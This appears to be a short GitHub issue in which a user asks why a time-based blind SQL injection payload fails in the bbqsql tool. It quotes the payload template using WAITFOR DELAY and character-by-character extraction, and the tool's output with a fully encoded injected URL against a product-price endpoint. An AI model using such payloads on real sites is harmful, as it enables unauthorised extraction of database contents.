time problem #49
Description
i need hep in time method
while i put this value in query
if(ASCII(SUBSTRING((SELECT @@Version LIMIT 1 OFFSET ${row_index}) , ${char_index} ,1))) ${comparator:>}ASCII(${char_val}) WAITFOR DELAY '0:0:0${sleep}'
but this didnt work it give true and bbqsql then stop
sure my value is not correct so what is the solution
this is the output before it stop
Injecting into 'url' parameter
It looks like this: http://www.x.com/y/z.php?action=get_new_price&id_pack=58&pack_page=1&productsAttribute[]=73231&products_exclude[]=1%20if%28ASCII%28SUBSTRING%28%28SELECT%20%40%40version%20LIMIT%201%20OFFSET%200%29%20%2C%201%20%2C1%29%29%29%20%3EASCII%28%29%20WAITFOR%20DELAY%20%270%5C%3A0%5C%3A0%27&qty=1&qtys[]=1
we will be treating this as a 'true' response
for the sample requests, the response's 'time' were the following :
[0.3397238254547119, 0.16059422492980957, 0.16398906707763672, 0.1356668472290039]